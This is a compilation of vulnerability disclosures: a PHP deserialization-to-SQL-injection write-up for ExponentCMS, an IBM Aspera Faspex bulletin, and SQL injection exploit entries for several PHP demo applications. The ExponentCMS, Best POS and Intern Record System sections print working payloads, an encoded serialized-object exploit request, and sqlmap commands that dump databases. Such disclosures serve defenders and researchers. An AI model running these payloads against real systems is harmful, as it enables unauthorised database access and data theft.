SQL Injection vulnerability in Exponent-CMS v.2.6.0 fixed in 2.7.0 allows attackers to gain access to sensitive information via the selectValue function in the expConfig class.

**Vulnerability Info****Vulnerability Type**

ExponentCMS unauthticate sql injection

**Vulnerability Version**

v2.6.0

exponentcms/exponent-cms#1542

**Recurring environment**

*   Windows 10\* PHP 5.4.5\* Apache 2.4.23

**Author**

pang0lin@webray.com.cn inc.

**Vulnerability Description AND recurrence:**

1.  The security issue is occured at file \\framework\\modules\\eaas\\controllers\\eaasController.php The line number nearby 76.
    
        public function api() {
             if (empty($this->params['apikey'])) {
                 $_REQUEST['apikey'] = true;  // set this to force an ajax reply
                 $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);
                 $ar->send();  //FIXME this doesn't seem to work correctly in this scenario
             } else {
                 $key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));  //step 1
                 if (is_object($key) && $key->mod === "eaas") {
                     preg_match('/[a-zA-Z0-9_@]*/', $key->src, $matches);
                     $key->src = $matches[0];
                     // var_dump($key);
                     $cfg = new expConfig($key); // step 2
                     $this->config = $cfg->config;
                     $cfg = new expConfig($key);
                     $this->config = $cfg->config;
                 }
                 if(empty($cfg->id)) {
                     $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);
                     $ar->send();
                 } else {
                     if (!empty($this->params['get'])) {
                         $this->handleRequest();
                     } else {
                         $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);
                         $ar->send();
                     }
                 }
             }
         }
        
    

2.  We can see issue with steps. step 1. The user's input apikey can be decoded with base64 and serilized.

step 2. The key goes into class of 'expConfig'. we try to find the definition.

        class expConfig extends expRecord {
    	protected $table = 'expConfigs';
    
    	function __construct($params=null) {
    		global $db;
    
            if (!is_array($params)) {
                $this->location_data = serialize($params);
                parent::__construct($db->selectValue($this->table, 'id', "location_data='".$this->location_data."'"));  //step 3
            } else {
                parent::__construct($params);
            }
    
    		// treat the loc data like an id - if the location data come thru as an object we need to look up the record
                //         if (!empty($params->src)) {
                //             echo "1";
                //             // if we hav a src, ie this controller has sources
                // parent::__construct($db->selectValue($this->table, 'id', "location_data='".$this->location_data."'"));
                //         } else {
                //             echo "2";
                //             // if we don't have a sourced controller, might still have a config for it.
                // parent::__construct($db->selectValue($this->table, 'id'));
                //}
    		$this->config = expUnserialize($this->config);
            if (!is_array($this->config)) {
                $this->config = array();
            }
            // now to artificially attach any file objects to the config
            if (!empty($this->config['expFile'])) {
                foreach ($this->config['expFile'] as $type=>$file) {
                    if (is_array($file)) foreach ($file as $key=>$filenum) {
                        if (is_numeric($filenum)) {
                            $this->config['expFile'][$type][$key] = new expFile($filenum);
                        } elseif (!is_object($filenum)) {
                            unset($this->config['expFile'][$type][$key]);
                        }
                    }
                }
            }
    	}
    

3.  At step 3. We can see the variable '$this->location\_data' derectly use by function 'selectValue' without any filter.Try to find the definition.

            /**
        * @param  $table
        * @param  $col
        * @param null $where
        * @return null
        */
       function selectValue($table, $col, $where=null) {
           if ($where == null)
               $where = "1";
           $sql = "SELECT " . $col . " FROM `" . $this->prefix . "$table` WHERE $where LIMIT 0,1";  //step 4
      
           $res = @mysqli_query($this->connection, $sql);
    
           if ($res == null)
               return null;
           $obj = mysqli_fetch_object($res);
           if (is_object($obj)) {
               return $obj->$col;
           } else {
               return null;
           }
       }
    

4.  Now. it's clearly to understand the issue. The user input is like . $a = new eaasController();$a->mod = 'eaas';$a->src="aaaaaabbbb";$a->abc="1' union select sleep(5) -- a";var\_dump(urlencode(base64\_encode(serialize($a)))); then, we can use this payload to test if the target is vulnerable. If the target is vulnerable, the request will use more than 10s.

    POST /index.php HTTP/1.1
    Host: exponentcms.org
    
    controller=eaas&action=api&get=photos&apikey=TzoxNDoiZWFhc0NvbnRyb2xsZXIiOjI4OntzOjExOiJ1c2VyYWN0aW9ucyI7YToxOntzOjc6InNob3dhbGwiO3M6MTk6Ikluc3RhbGwgU2VydmljZSBBUEkiO31zOjE0OiJyZW1vdmVfY29uZmlncyI7YToxMDp7aTowO3M6MTE6ImFnZ3JlZ2F0aW9uIjtpOjE7czoxMDoiY2F0ZWdvcmllcyI7aToyO3M6ODoiY29tbWVudHMiO2k6MztzOjc6ImVhbGVydHMiO2k6NDtzOjg6ImZhY2Vib29rIjtpOjU7czo1OiJmaWxlcyI7aTo2O3M6MTA6InBhZ2luYXRpb24iO2k6NztzOjM6InJzcyI7aTo4O3M6NDoidGFncyI7aTo5O3M6NzoidHdpdHRlciI7fXM6NDoidGFicyI7YTo3OntzOjc6ImFib3V0dXMiO3M6ODoiQWJvdXQgVXMiO3M6NDoiYmxvZyI7czo0OiJCbG9nIjtzOjU6InBob3RvIjtzOjY6IlBob3RvcyI7czo1OiJtZWRpYSI7czo1OiJNZWRpYSI7czo1OiJldmVudCI7czo2OiJFdmVudHMiO3M6MTI6ImZpbGVkb3dubG9hZCI7czoxNDoiRmlsZSBEb3dubG9hZHMiO3M6NDoibmV3cyI7czo0OiJOZXdzIjt9czo3OiIAKgBkYXRhIjthOjA6e31zOjEyOiIAKgBjbGFzc25hbWUiO3M6MTQ6ImVhYXNDb250cm9sbGVyIjtzOjEzOiJiYXNlY2xhc3NuYW1lIjtzOjQ6ImVhYXMiO3M6OToiY2xhc3NpbmZvIjtOO3M6MTQ6ImJhc2Vtb2RlbF9uYW1lIjtzOjk6ImV4cFJlY29yZCI7czoxMToibW9kZWxfdGFibGUiO047czoxNDoiACoAcGVybWlzc2lvbnMiO2E6NTp7czo2OiJtYW5hZ2UiO3M6NjoiTWFuYWdlIjtzOjk6ImNvbmZpZ3VyZSI7czo5OiJDb25maWd1cmUiO3M6NjoiY3JlYXRlIjtzOjY6IkNyZWF0ZSI7czo0OiJlZGl0IjtzOjQ6IkVkaXQiO3M6NjoiZGVsZXRlIjtzOjY6IkRlbGV0ZSI7fXM6MTY6IgAqAG1fcGVybWlzc2lvbnMiO2E6Njp7czo4OiJhY3RpdmF0ZSI7czo4OiJBY3RpdmF0ZSI7czo3OiJhcHByb3ZlIjtzOjc6IkFwcHJvdmUiO3M6NToibWVyZ2UiO3M6NToiTWVyZ2UiO3M6NjoicmVyYW5rIjtzOjY6IlJlUmFuayI7czo2OiJpbXBvcnQiO3M6MTI6IkltcG9ydCBJdGVtcyI7czo2OiJleHBvcnQiO3M6MTI6IkV4cG9ydCBJdGVtcyI7fXM6MjE6IgAqAHJlbW92ZV9wZXJtaXNzaW9ucyI7YTowOnt9czoxODoiACoAYWRkX3Blcm1pc3Npb25zIjthOjA6e31zOjIxOiIAKgBtYW5hZ2VfcGVybWlzc2lvbnMiO2E6MDp7fXM6MTQ6InJlcXVpcmVzX2xvZ2luIjthOjA6e31zOjg6ImZpbGVwYXRoIjtzOjgwOiIvcGhwc3R1ZHlfcHJvL1dXVy9leHBvbmVudC9mcmFtZXdvcmsvbW9kdWxlcy9lYWFzL2NvbnRyb2xsZXJzL2VhYXNDb250cm9sbGVyLnBocCI7czo4OiJ2aWV3cGF0aCI7czo2MDoiL3BocHN0dWR5X3Byby9XV1cvZXhwb25lbnQvZnJhbWV3b3JrL21vZHVsZXMvZWFhcy92aWV3cy9lYWFzIjtzOjE3OiJyZWxhdGl2ZV92aWV3cGF0aCI7czoxNToiZWFhcy92aWV3cy9lYWFzIjtzOjEwOiJhc3NldF9wYXRoIjtzOjQwOiIvZXhwb25lbnQvZnJhbWV3b3JrL21vZHVsZXMvZWFhcy9hc3NldHMvIjtzOjY6ImNvbmZpZyI7YTowOnt9czo2OiJwYXJhbXMiO2E6MDp7fXM6MzoibG9jIjtPOjg6InN0ZENsYXNzIjozOntzOjM6Im1vZCI7czo0OiJlYWFzIjtzOjM6InNyYyI7czowOiIiO3M6MzoiaW50IjtzOjA6IiI7fXM6MTE6ImNvZGVxdWFsaXR5IjtzOjY6InN0YWJsZSI7czoxNDoicnNzX2lzX3BvZGNhc3QiO2I6MDtzOjQ6ImVhYXMiO086OToiZXhwUmVjb3JkIjoyMzp7czoxMjoiACoAY2xhc3NpbmZvIjtOO3M6OToiY2xhc3NuYW1lIjtzOjk6ImV4cFJlY29yZCI7czo5OiJ0YWJsZW5hbWUiO3M6OToiZXhwUmVjb3JkIjtzOjEwOiJpZGVudGlmaWVyIjtzOjI6ImlkIjtzOjEzOiJyYW5rX2J5X2ZpZWxkIjtzOjA6IiI7czoxMjoiZ3JvdXBpbmdfc3FsIjtzOjA6IiI7czoxOToiaGFzX2V4dGVuZGVkX2ZpZWxkcyI7YTowOnt9czo3OiJoYXNfb25lIjthOjA6e31zOjg6Imhhc19tYW55IjthOjA6e31zOjEzOiJoYXNfbWFueV9zZWxmIjthOjA6e31zOjIzOiJoYXNfYW5kX2JlbG9uZ3NfdG9fbWFueSI7YTowOnt9czoyMzoiaGFzX2FuZF9iZWxvbmdzX3RvX3NlbGYiO2E6MDp7fXM6MTg6ImRlZmF1bHRfc29ydF9maWVsZCI7czowOiIiO3M6MjI6ImRlZmF1bHRfc29ydF9kaXJlY3Rpb24iO3M6MDoiIjtzOjEzOiJnZXRfYXNzb2NfZm9yIjthOjA6e31zOjI0OiIAKgBhdHRhY2hhYmxlX2l0ZW1fdHlwZXMiO2E6MDp7fXM6MjQ6ImF0dGFjaGFibGVfaXRlbXNfdG9fc2F2ZSI7TjtzOjE4OiJnZXRfYXR0YWNoYWJsZV9mb3IiO2E6MDp7fXM6ODoidmFsaWRhdGUiO2E6MDp7fXM6OToidmFsaWRhdGVzIjthOjA6e31zOjE1OiJkb19ub3RfdmFsaWRhdGUiO2E6MDp7fXM6MTg6InN1cHBvcnRzX3JldmlzaW9ucyI7YjowO3M6MTQ6Im5lZWRzX2FwcHJvdmFsIjtiOjA7fXM6MzoibW9kIjtzOjQ6ImVhYXMiO3M6Mzoic3JjIjtzOjEwOiJhYWFhYWFiYmJiIjtzOjM6ImFiYyI7czoyOToiMScgdW5pb24gc2VsZWN0IHNsZWVwKDUpIC0tIGEiO30%3D

CVE-2021-32441: CVEproject/ExponentCMS_v2.6.0_sqli.md at main · pang0lin/CVEproject

IBM Aspera Faspex 4.4.1 could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.

**Security Bulletin**

  

**Summary**

This Security Bulletin addresses security vulnerabilities that have been remediated in IBM Aspera Faspex 4.4.2 PL2.

**Vulnerability Details**

**CVEID:**   CVE-2022-28330  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information. An attacker could exploit this vulnerability to read beyond bounds when configured to process requests with the mod\_isapi module.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228341 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2023-22868  
**DESCRIPTION:**   IBM Aspera Faspex is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244117 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

**CVEID:**   CVE-2022-30556  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information, caused by an error in mod\_lua with websockets. An attacker could exploit this vulnerability to return lengths to applications calling r:wsread() that point past the end of the storage allocated for the buffer.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228336 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-31813  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to bypass security restrictions, caused by the failure to send the X-Forwarded-\* headers to the origin server based on client side Connection header hop-by-hop mechanism. An attacker could exploit this vulnerability to bypass IP based authentication on the origin server/application.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228337 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-30522  
**DESCRIPTION:**   Apache HTTP Server is vulnerable to a denial of service when configured to do transformations with mod\_sed in contexts where the input to mod\_sed may be very large. By making excessively large memory allocations, a remote attacker could exploit this vulnerability to trigger an abort.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228338 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2022-47986  
**DESCRIPTION:**   IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/243512 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-28615  
**DESCRIPTION:**   Apache HTTP Server could allow a remote attacker to obtain sensitive information, caused by a read beyond bounds in ap\_strcmp\_match() when provided with an extremely large input buffer. An attacker could exploit this vulnerability to crash or disclose information.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228340 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)

**CVEID:**   CVE-2022-26377  
**DESCRIPTION:**   Apache HTTP Server is vulnerable to HTTP request smuggling, caused by an inconsistent Interpretation of HTTP Requests vulnerability in mod\_proxy\_ajp. An attacker could exploit this vulnerability to smuggle requests to the AJP server it forwards requests to.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/228343 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2018-25032  
**DESCRIPTION:**   Zlib is vulnerable to a denial of service, caused by a memory corruption in the deflate operation. By using many distant matches, a remote attacker could exploit this vulnerability to cause the application to crash.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222615 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-2068  
**DESCRIPTION:**   OpenSSL could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the c\_rehash script. By sending a specially-crafted request using shell metacharacters, an attacker could exploit this vulnerability to execute arbitrary commands with the privileges of the script on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/226018 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**Affected Products and Versions**

IBM Aspera Faspex 4.4.1 and earlier

**Remediation/Fixes**

It is recommended to apply the fix as soon as possible, see link below.

**Product(s)**

**Fixing VRM**

**Platform**

**Link to Fix**

IBM Aspera Faspex

4.4.2 PL2

Windows

click here

IBM Aspera Faspex

4.4.2 PL2

Linux

click here

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

CVE-2023-22868 and CVE-2022-47986 were reported to IBM by Max Garrett - Assetnote

**Change History**

26 Jan 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSGPEF","label":"IBM Aspera Faspex"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"4.4.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-47986: IBM Aspera Faspex 4.4.2 PL2 has addressed multiple vulnerabilities (CVE-2022-28330, CVE-2023-22868, CVE-2022-30556, CVE-2022-31813, CVE-2022-30522, CVE-2022-47986, CVE-2022-28615, CVE-2022-26377, CVE-

Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 14/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA```GET /kruxton/billing/index.php?id=9 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://localhost/kruxton/index.php?page=ordersCookie: PHPSESSID=61ubuj4m01jk5tibc7banpldaoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```# PayloadGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 58HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=9 AND 4017=4017    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=9 OR (SELECT 7313 FROM(SELECTCOUNT(*),CONCAT(0x7162767171,(SELECT(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: id=-9498 UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL------[19:33:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)```----------------------------# Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA_________python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"--dbms=mysql --level 3 --risk 3 --dbs --fresh-queriesURI parameter '#1*' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52HTTP(s) requests:---Parameter: #1* (URI)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM(SELECT(SLEEP(5)))zHgC)    Type: UNION query    Title: Generic UNION query (NULL) - 5 columns    Payload: http://localhost:80/kruxton/manage_user.php?id=-1830<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECTNULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL------[10:58:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Best POS Management System 1.0 SQL Injection

SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.

Submitted by razormist on Friday, August 26, 2022 - 22:47.

**Simple Task Managing System in PHP With MySQLi Free Source Code******Introduction****

The **Simple Task Managing System in PHP With MySQLi** is a simple web system coded in a **PHP** programming language. This project contains an advance coding script that display fully operational function of the system. The system contain many functionalities that use its purpose. This **Simple Task Managing System** is a project that can help students taking IT related courses. This is a simple system that tends to help beginners to start their php programming career . This **Simple Task Managing System in PHP With MySQLi** provide a learning references to help beginners learn to use **PHP** programming.

The **Simple Task Managing System in PHP With MySQLi Free Source Code** is free to be downloaded just read the content below for more info. This application is for **educational purpose only**.

****Simple Task Managing System in PHP With MySQLi Free Source Code** Basic Information**

*   **Language used:** PHP
*   **Front-end used:** HTML & CSS
*   **Coding Tool used:** Notepad++ or any text editor that can run php files
*   **Type:** Web Application
*   **Database used:** MySQLi

****About Simple Task Managing System in PHP With MySQLi****

The **Simple Task Managing System in PHP With MySQLi** was developed using **PHP** programming language. This is a user-friendly kind of application that can be easily modified to be used in your on working projects. The system contains a function that can allow user to create project title. The application is strictly protected by a user login information, you need to enter a correct username and password to fully access the feature of the system. The user can do many things in the system he/she can add new project, add task list, search projects. You can create your on project by going in the add project and enter the required field. Each project has a task list you can assign a task and change its status base on your project progression. This project tends to educate you on how to create a simple php system in a basic way.

****Simple Task Managing System in PHP With MySQLi Free Source Code** Features**

*   **Display the Overall Project**
*   **Can add new Project**
*   **Each Project has a Task**
*   **You can assign you task**
*   **Display total task for each project**

****Sample System Screenshot**:**

****Login Page****

****Add Project Page****

****Project List Page****

****Add Task Page****

****Task List Page****

****Simple Task Managing System in PHP With MySQLi Free Source Code** Installation Guide**

1.  **Download** and **Install** any **local web server** such as **XAMPP, WAMP, etc.**
2.  **Download** the source code in this site
3.  **Open** your **XAMPP Control Panel** and start **Apache** and **MySQL**.
4.  **Extract** the **downloaded source code **zip** file**.
5.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
6.  **Browse** the **PHPMyAdmin** in a **browser**.
7.  **Create** a **new database** name it **tasker**.
8.  **Import** the attached **SQL**file. The file name is **tasker.sql** located inside the database folder.
9.  **Browse** the **Task Management System** in a **browser**. **http://localhost/Task%20Managing%20System%20in%20PHP/**.

**User Login Information**

**Username:** admin

**Password:** admin

That's all, The **Simple Task Managing System in PHP With MySQLi** was created fully functional using **PHP** language. I hope that this project can help you to what you are looking for. For more **projects and tutorials** please kindly visit this site. Enjoy Coding!

The **Simple Task Managing System in PHP With MySQLi Free Source Code** is ready to be downloaded just kindly click the download button below.

**Related Projects & Tutorials**

Simple Task Managing System in PHP With MySQLi

*   4256 views

CVE-2022-40032: Simple Task Managing System in PHP With MySQLi Free Source Code

SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.

**CVE-2022-40347\_Intern-Record-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated**

CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Exploit Title: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Date: 2022-06-09

Exploit Author: Hamdi Sevben

Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/

Software Link: https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

Version: 1.0

Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53

CVE: CVE-2022-40347

References:

https://code-projects.org/intern-record-system-in-php-with-source-code/

https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

1.  Description:

Intern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.

2.  Proof of Concept:

In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.

Then run SQLmap to extract the data from the database:

sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "name" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "phone" --risk="3" --level="3" --method="POST" --data="phone=test&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

3.  Example payload:

\-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

4.  Burpsuite request on 'phone' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

